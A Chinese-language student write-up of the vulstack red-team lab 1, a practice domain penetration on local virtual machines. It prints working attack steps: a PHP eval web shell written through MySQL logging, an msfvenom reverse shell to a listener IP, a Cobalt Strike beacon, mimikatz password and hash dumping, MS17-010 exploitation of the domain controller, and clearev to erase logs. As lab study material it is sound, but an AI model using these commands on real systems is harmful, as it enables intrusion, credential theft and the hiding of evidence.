vulstack 红队评估(一)
前言
这是我第一次做内网渗透的相关内容,做一个学习记录。
准备工作
下载镜像,虚拟机默认密码hongrisec@2019,登陆后有两台需要改密码,注意密码的格式。。别忘了再重装– 我的密码是
对网络的部署需要一定的计算机网络基础知识。
kali 网卡: NAT
web服务器(DMZ区): 网卡1 NAT 网卡2 VMNET1(hostonly)
内网服务器1(域控) 网卡 VMNET1 hostonly
内网服务器2 : 网卡 VMNET1 hostonly
部署好后由于Windows7开了防火墙,可以向外ping但是ping不动该机器,用两台内网主机ping一下试试能不能ping动。
正常情况下
主机可以ping通两台内网主机,win7可以ping通两台内网主机,kali可以ping通win7。
web渗透工作
开局phpstudy探针,猜一猜数据库账号密码root/root
phpmyadmin默认路径,日进去尝试写日志getshell。
首先看看是否开日志了
SHOW VARIABLES LIKE ‘%general%’
没开,开一下。
set golbal general_log=on;
设置下日志路径(探针中查看)
1 | set global general_log_file ='C:/phpStudy/WWW/2.php'; |
接下来查询一下,内容是shell。
1 | select '<?php eval($_POST[a]); ?>'; |
之后访问蚁剑链接shell就可以了
连上shell后whoami一下,发现是administrator权限,在GOD域下(?对域的概念还不太了解)
接下来使用msfvenom生成shell连接。
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.54.2 lport=5555 -f exe>shell.exe |
在蚁剑执行exe文件即可获得反弹shell
不太会用msf,执行命令一直啥都没有,最后知道msf有一套自己的命令,输入shell后获得了靶机的shell。
1 | run post/windows/manage/enable_rdp |
接下来尝试上传cs 的beacon。
cs首先设置listener,生成Windows的32位可执行程序 a.exe
通过msf的meterpreter上传到目标主机并执行
upload /root/Desktop/1.exe
execute -f 1.exe
之后在cs可以看到服务器上线。
msf meterpreter 简介
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。
最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。
需要说明的meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。 连上vpn又在内网中使用psexec和bind_tcp的时候经常会出现这种情况
内网信息搜集
在cs中尝试使用mimikatz获取登录的用户名和密码
使用ladon扫描内网
得到结果:
192.168.52.3 139 445 3389
192.168.52.138 80 445 139 389
192.168.52.141 21 139
192.168.52.138主机389端口开启了LDAP服务,可能是DC。
下面尝试添加路由,使用Windows7作为跳板机访问Windows2003
经尝试后可以ping通,可以顺利访问。
渗透域内成员141
使用nmap对目标主机进行扫描,尝试扫描SMB漏洞
发现漏洞,尝试利用
成功获取目标机器的shell。
load mimikatz
mimikatz_command -f samdump::hashes 获取主机的密码,这样就成功抓到了主机的用户名和NTML-hash值。
渗透域控
使用nmap对目标ip进行扫描,发现MS17-010和MS08-067漏洞,这次尝试利用MS17-010进行攻击。
首先关闭防火墙
1 | use auxiliary/admin/smb/ms17_010_command |
接下来获得一个正向shell
1 | use exploit/windows/smb/ms17_010_psexec |
之后我用mimikatz抓密码出了点问题,报错mod_process::getVeryBasicModulesListForProcess : (0x0000012b)
搜了搜这个问题是因为mimikatz默认加载32位系统,但是我们的系统是64位的,所以首先要将meterpreter迁移到一个64位进程上。
PS一下,选择权限为NT AUTHORITY\SYSTEM权限的进程
migrate pid 即可。
之后在用mimikatz抓密码就能抓到了。
攻击结束后使用clearev命令清除攻击痕迹。
总结
第一次完整地做内网渗透相关的练习,对内网渗透的过程不太熟悉,工具的使用也不熟悉,对一些概念性的基础问题也不太熟悉。。。希望能在后续的学习过程中不断完善这些方面。
参考链接
https://shavchen.github.io/vulstack-1-writeup/#%E6%B8%97%E9%80%8F%E5%9F%9F%E6%8E%A7